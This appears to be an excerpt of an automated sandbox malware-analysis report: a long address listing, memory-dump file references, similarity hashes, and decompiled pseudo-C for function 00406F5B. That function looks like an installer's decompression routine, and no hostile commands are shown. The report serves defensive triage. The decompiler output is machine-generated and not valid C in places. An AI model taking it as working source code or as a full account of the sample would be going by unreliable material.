                                                                            0x00406c4d
                                                                            0x00406c4d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c71
                                                                            0x00406c71
                                                                            0x00406c75
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c7b
                                                                            0x00406c7b
                                                                            0x00406c7f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c85
                                                                            0x00406c85
                                                                            0x00406c87
                                                                            0x00406c8b
                                                                            0x00406c8b
                                                                            0x00406c8e
                                                                            0x00406c92
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406ce2
                                                                            0x00406ce2
                                                                            0x00406ce6
                                                                            0x00406ced
                                                                            0x00406ced
                                                                            0x00406cf0
                                                                            0x00406cf3
                                                                            0x00406cfd
                                                                            0x00000000
                                                                            0x00406cfd
                                                                            0x00406ce8
                                                                            0x00406ce8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d09
                                                                            0x00406d09
                                                                            0x00406d0d
                                                                            0x00406d14
                                                                            0x00406d17
                                                                            0x00406d1a
                                                                            0x00406d0f
                                                                            0x00406d0f
                                                                            0x00406d0f
                                                                            0x00406d1d
                                                                            0x00406d20
                                                                            0x00406d23
                                                                            0x00406d23
                                                                            0x00406d26
                                                                            0x00406d29
                                                                            0x00406d2c
                                                                            0x00406d2c
                                                                            0x00406d2f
                                                                            0x00406d36
                                                                            0x00406d3b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406dc9
                                                                            0x00406dc9
                                                                            0x00406dcd
                                                                            0x0040716b
                                                                            0x0040716b
                                                                            0x00000000
                                                                            0x0040716b
                                                                            0x00406dd3
                                                                            0x00406dd3
                                                                            0x00406dd6
                                                                            0x00406dd9
                                                                            0x00406ddd
                                                                            0x00406de0
                                                                            0x00406de6
                                                                            0x00406de8
                                                                            0x00406de8
                                                                            0x00406de8
                                                                            0x00406deb
                                                                            0x00406dee
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004069be
                                                                            0x004069be
                                                                            0x004069c2
                                                                            0x0040712f
                                                                            0x0040712f
                                                                            0x00000000
                                                                            0x0040712f
                                                                            0x004069c8
                                                                            0x004069c8
                                                                            0x004069cb
                                                                            0x004069ce
                                                                            0x004069d2
                                                                            0x004069d5
                                                                            0x004069db
                                                                            0x004069dd
                                                                            0x004069dd
                                                                            0x004069dd
                                                                            0x004069e0
                                                                            0x004069e3
                                                                            0x004069e3
                                                                            0x004069e6
                                                                            0x004069e9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004069ef
                                                                            0x004069ef
                                                                            0x004069f5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004069fb
                                                                            0x004069fb
                                                                            0x004069ff
                                                                            0x00406a02
                                                                            0x00406a05
                                                                            0x00406a08
                                                                            0x00406a0b
                                                                            0x00406a0c
                                                                            0x00406a0f
                                                                            0x00406a11
                                                                            0x00406a17
                                                                            0x00406a1a
                                                                            0x00406a1d
                                                                            0x00406a20
                                                                            0x00406a23
                                                                            0x00406a26
                                                                            0x00406a29
                                                                            0x00406a45
                                                                            0x00406a48
                                                                            0x00406a4b
                                                                            0x00406a4e
                                                                            0x00406a55
                                                                            0x00406a59
                                                                            0x00406a5b
                                                                            0x00406a5f
                                                                            0x00406a2b
                                                                            0x00406a2b
                                                                            0x00406a2f
                                                                            0x00406a37
                                                                            0x00406a3c
                                                                            0x00406a3e
                                                                            0x00406a40
                                                                            0x00406a40
                                                                            0x00406a62
                                                                            0x00406a69
                                                                            0x00406a6c
                                                                            0x00000000
                                                                            0x00406a72
                                                                            0x00406a72
                                                                            0x00000000
                                                                            0x00406a72
                                                                            0x00000000
                                                                            0x00406a77
                                                                            0x00406a77
                                                                            0x00406a7b
                                                                            0x0040713b
                                                                            0x0040713b
                                                                            0x00000000
                                                                            0x0040713b
                                                                            0x00406a81
                                                                            0x00406a81
                                                                            0x00406a84
                                                                            0x00406a87
                                                                            0x00406a8b
                                                                            0x00406a8e
                                                                            0x00406a94
                                                                            0x00406a96
                                                                            0x00406a96
                                                                            0x00406a96
                                                                            0x00406a99
                                                                            0x00406a9c
                                                                            0x00406a9c
                                                                            0x00406a9c
                                                                            0x00406aa2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406aa4
                                                                            0x00406aa4
                                                                            0x00406aa7
                                                                            0x00406aaa
                                                                            0x00406aad
                                                                            0x00406ab0
                                                                            0x00406ab3
                                                                            0x00406ab6
                                                                            0x00406ab9
                                                                            0x00406abc
                                                                            0x00406abf
                                                                            0x00406ac2
                                                                            0x00406ada
                                                                            0x00406add
                                                                            0x00406ae0
                                                                            0x00406ae3
                                                                            0x00406ae3
                                                                            0x00406ae6
                                                                            0x00406aea
                                                                            0x00406aec
                                                                            0x00406ac4
                                                                            0x00406ac4
                                                                            0x00406acc
                                                                            0x00406ad1
                                                                            0x00406ad3
                                                                            0x00406ad5
                                                                            0x00406ad5
                                                                            0x00406aef
                                                                            0x00406af6
                                                                            0x00406af9
                                                                            0x00000000
                                                                            0x00406afb
                                                                            0x00406afb
                                                                            0x00000000
                                                                            0x00406afb
                                                                            0x00406af9
                                                                            0x00406b00
                                                                            0x00406b00
                                                                            0x00406b00
                                                                            0x00406b00
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406b3b
                                                                            0x00406b3b
                                                                            0x00406b3f
                                                                            0x00407147
                                                                            0x00407147
                                                                            0x00000000
                                                                            0x00407147
                                                                            0x00406b45
                                                                            0x00406b45
                                                                            0x00406b48
                                                                            0x00406b4b
                                                                            0x00406b4f
                                                                            0x00406b52
                                                                            0x00406b58
                                                                            0x00406b5a
                                                                            0x00406b5a
                                                                            0x00406b5a
                                                                            0x00406b5d
                                                                            0x00406b60
                                                                            0x00406b60
                                                                            0x00406b66
                                                                            0x00406b04
                                                                            0x00406b04
                                                                            0x00406b07
                                                                            0x00000000
                                                                            0x00406b07
                                                                            0x00406b68
                                                                            0x00406b68
                                                                            0x00406b6b
                                                                            0x00406b6e
                                                                            0x00406b71
                                                                            0x00406b74
                                                                            0x00406b77
                                                                            0x00406b7a
                                                                            0x00406b7d
                                                                            0x00406b80
                                                                            0x00406b83
                                                                            0x00406b86
                                                                            0x00406b9e
                                                                            0x00406ba1
                                                                            0x00406ba4
                                                                            0x00406ba7
                                                                            0x00406ba7
                                                                            0x00406baa
                                                                            0x00406bae
                                                                            0x00406bb0
                                                                            0x00406b88
                                                                            0x00406b88
                                                                            0x00406b90
                                                                            0x00406b95
                                                                            0x00406b97
                                                                            0x00406b99
                                                                            0x00406b99
                                                                            0x00406bb3
                                                                            0x00406bba
                                                                            0x00406bbd
                                                                            0x00000000
                                                                            0x00406bbf
                                                                            0x00406bbf
                                                                            0x00000000
                                                                            0x00406bbf
                                                                            0x00000000
                                                                            0x00406e4c
                                                                            0x00406e4c
                                                                            0x00406e50
                                                                            0x00407177
                                                                            0x00407177
                                                                            0x00000000
                                                                            0x00407177
                                                                            0x00406e56
                                                                            0x00406e56
                                                                            0x00406e59
                                                                            0x00406e5c
                                                                            0x00406e60
                                                                            0x00406e63
                                                                            0x00406e69
                                                                            0x00406e6b
                                                                            0x00406e6b
                                                                            0x00406e6b
                                                                            0x00406e6e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c1c
                                                                            0x00406c1c
                                                                            0x00406c1f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f5b
                                                                            0x00406f5b
                                                                            0x00406f5f
                                                                            0x00406f81
                                                                            0x00406f81
                                                                            0x00406f84
                                                                            0x00406f8e
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00406f91
                                                                            0x00406f61
                                                                            0x00406f61
                                                                            0x00406f64
                                                                            0x00406f68
                                                                            0x00406f6b
                                                                            0x00406f6b
                                                                            0x00406f6e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407018
                                                                            0x00407018
                                                                            0x0040701c
                                                                            0x0040703a
                                                                            0x0040703a
                                                                            0x0040703a
                                                                            0x0040703a
                                                                            0x00407041
                                                                            0x00407048
                                                                            0x0040704f
                                                                            0x0040704f
                                                                            0x00407056
                                                                            0x00407059
                                                                            0x00407060
                                                                            0x00000000
                                                                            0x00407063
                                                                            0x0040701e
                                                                            0x0040701e
                                                                            0x00407021
                                                                            0x00407024
                                                                            0x00407027
                                                                            0x0040702e
                                                                            0x00406f72
                                                                            0x00406f72
                                                                            0x00406f75
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407109
                                                                            0x00407109
                                                                            0x0040710c
                                                                            0x0040700d
                                                                            0x0040700d
                                                                            0x0040700d
                                                                            0x00000000
                                                                            0x00407013
                                                                            0x00000000
                                                                            0x00406d43
                                                                            0x00406d43
                                                                            0x00406d45
                                                                            0x00406d4c
                                                                            0x00406d4d
                                                                            0x00406d4f
                                                                            0x00406d52
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407056
                                                                            0x00407056
                                                                            0x00407059
                                                                            0x00407060
                                                                            0x00000000
                                                                            0x00407063
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d88
                                                                            0x00406d88
                                                                            0x00406d8b
                                                                            0x00406dc1
                                                                            0x00406dc1
                                                                            0x00406ef1
                                                                            0x00406ef1
                                                                            0x00406ef1
                                                                            0x00406ef1
                                                                            0x00406ef4
                                                                            0x00406ef4
                                                                            0x00406ef7
                                                                            0x00406ef9
                                                                            0x00407183
                                                                            0x00407183
                                                                            0x00000000
                                                                            0x00407183
                                                                            0x00406eff
                                                                            0x00406eff
                                                                            0x00406f02
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f08
                                                                            0x00406f08
                                                                            0x00406f0c
                                                                            0x00406f0f
                                                                            0x00406f0f
                                                                            0x00406f0f
                                                                            0x00000000
                                                                            0x00406f0f
                                                                            0x00406d8d
                                                                            0x00406d8d
                                                                            0x00406d8f
                                                                            0x00406d91
                                                                            0x00406d93
                                                                            0x00406d96
                                                                            0x00406d97
                                                                            0x00406d99
                                                                            0x00406d9b
                                                                            0x00406d9e
                                                                            0x00406da1
                                                                            0x00406db7
                                                                            0x00406db7
                                                                            0x00406dbc
                                                                            0x00406df4
                                                                            0x00406df4
                                                                            0x00406df8
                                                                            0x00406e21
                                                                            0x00406e24
                                                                            0x00406e26
                                                                            0x00406e2d
                                                                            0x00406e30
                                                                            0x00406e33
                                                                            0x00406e33
                                                                            0x00406e38
                                                                            0x00406e38
                                                                            0x00406e3a
                                                                            0x00406e3d
                                                                            0x00406e44
                                                                            0x00406e47
                                                                            0x00406e74
                                                                            0x00406e74
                                                                            0x00406e77
                                                                            0x00406e7a
                                                                            0x00406eee
                                                                            0x00406eee
                                                                            0x00406eee
                                                                            0x00406eee
                                                                            0x00000000
                                                                            0x00406eee
                                                                            0x00406e7c
                                                                            0x00406e7c
                                                                            0x00406e82
                                                                            0x00406e85
                                                                            0x00406e88
                                                                            0x00406e8b
                                                                            0x00406e8e
                                                                            0x00406e91
                                                                            0x00406e94
                                                                            0x00406e97
                                                                            0x00406e9a
                                                                            0x00406e9d
                                                                            0x00406eb6
                                                                            0x00406eb8
                                                                            0x00406ebb
                                                                            0x00406ebc
                                                                            0x00406ebf
                                                                            0x00406ec1
                                                                            0x00406ec4
                                                                            0x00406ec6
                                                                            0x00406ec8
                                                                            0x00406ecb
                                                                            0x00406ecd
                                                                            0x00406ed0
                                                                            0x00406ed4
                                                                            0x00406ed6
                                                                            0x00406ed6
                                                                            0x00406ed7
                                                                            0x00406eda
                                                                            0x00406edd
                                                                            0x00406e9f
                                                                            0x00406e9f
                                                                            0x00406ea7
                                                                            0x00406eac
                                                                            0x00406eae
                                                                            0x00406eb1
                                                                            0x00406eb1
                                                                            0x00406ee0
                                                                            0x00406ee7
                                                                            0x00406e71
                                                                            0x00406e71
                                                                            0x00406e71
                                                                            0x00406e71
                                                                            0x00000000
                                                                            0x00406ee9
                                                                            0x00406ee9
                                                                            0x00000000
                                                                            0x00406ee9
                                                                            0x00406ee7
                                                                            0x00406dfa
                                                                            0x00406dfa
                                                                            0x00406dfd
                                                                            0x00406dff
                                                                            0x00406e02
                                                                            0x00406e05
                                                                            0x00406e08
                                                                            0x00406e0a
                                                                            0x00406e0d
                                                                            0x00406e10
                                                                            0x00406e10
                                                                            0x00406e13
                                                                            0x00406e13
                                                                            0x00406e16
                                                                            0x00406e1d
                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00000000
                                                                            0x00406e1f
                                                                            0x00406e1f
                                                                            0x00000000
                                                                            0x00406e1f
                                                                            0x00406e1d
                                                                            0x00406da3
                                                                            0x00406da3
                                                                            0x00406da6
                                                                            0x00406da8
                                                                            0x00406dab
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406b0a
                                                                            0x00406b0a
                                                                            0x00406b0e
                                                                            0x00407153
                                                                            0x00407153
                                                                            0x00000000
                                                                            0x00407153
                                                                            0x00406b14
                                                                            0x00406b14
                                                                            0x00406b17
                                                                            0x00406b1a
                                                                            0x00406b1d
                                                                            0x00406b20
                                                                            0x00406b23
                                                                            0x00406b26
                                                                            0x00406b28
                                                                            0x00406b2b
                                                                            0x00406b2e
                                                                            0x00406b31
                                                                            0x00406b33
                                                                            0x00406b33
                                                                            0x00406b33
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c95
                                                                            0x00406c95
                                                                            0x00406c99
                                                                            0x0040715f
                                                                            0x0040715f
                                                                            0x00000000
                                                                            0x0040715f
                                                                            0x00406c9f
                                                                            0x00406c9f
                                                                            0x00406ca2
                                                                            0x00406ca5
                                                                            0x00406ca8
                                                                            0x00406caa
                                                                            0x00406caa
                                                                            0x00406caa
                                                                            0x00406cad
                                                                            0x00406cb0
                                                                            0x00406cb3
                                                                            0x00406cb6
                                                                            0x00406cb9
                                                                            0x00406cbc
                                                                            0x00406cbd
                                                                            0x00406cbf
                                                                            0x00406cbf
                                                                            0x00406cbf
                                                                            0x00406cc2
                                                                            0x00406cc5
                                                                            0x00406cc8
                                                                            0x00406ccb
                                                                            0x00406ccb
                                                                            0x00406ccb
                                                                            0x00406cce
                                                                            0x00406cd0
                                                                            0x00406cd0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f12
                                                                            0x00406f12
                                                                            0x00406f12
                                                                            0x00406f16
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f1c
                                                                            0x00406f1c
                                                                            0x00406f1f
                                                                            0x00406f22
                                                                            0x00406f25
                                                                            0x00406f27
                                                                            0x00406f27
                                                                            0x00406f27
                                                                            0x00406f2a
                                                                            0x00406f2d
                                                                            0x00406f30
                                                                            0x00406f33
                                                                            0x00406f36
                                                                            0x00406f39
                                                                            0x00406f3a
                                                                            0x00406f3c
                                                                            0x00406f3c
                                                                            0x00406f3c
                                                                            0x00406f3f
                                                                            0x00406f42
                                                                            0x00406f45
                                                                            0x00406f48
                                                                            0x00406f4b
                                                                            0x00406f4f
                                                                            0x00406f51
                                                                            0x00406f54
                                                                            0x00000000
                                                                            0x00406f56
                                                                            0x00406f56
                                                                            0x00406cd3
                                                                            0x00406cd3
                                                                            0x00000000
                                                                            0x00406cd3
                                                                            0x00406f54
                                                                            0x00407189
                                                                            0x00407189
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067b8
                                                                            0x004071c0
                                                                            0x004071c0
                                                                            0x00000000
                                                                            0x004071c0
                                                                            0x0040700d
                                                                            0x0040708d
                                                                            0x00407056

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8cc43af0f3dc7360b650843029f4fb37e98cf8e44e9d3f0eb3b9d5ec05d02dde
                                                                            • Instruction ID: 56db4e79aaf5e8580c905796a14d264bc3fb4972df64c765fca97ee639103a5c
                                                                            • Opcode Fuzzy Hash: 8cc43af0f3dc7360b650843029f4fb37e98cf8e44e9d3f0eb3b9d5ec05d02dde
                                                                            • Instruction Fuzzy Hash: 87A15531E04229CBDF28CFA8C8446ADBBB1FF44305F14812ED856BB281C7786A86DF45
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406F5B, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 98%
                                                                            			E00406F5B() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
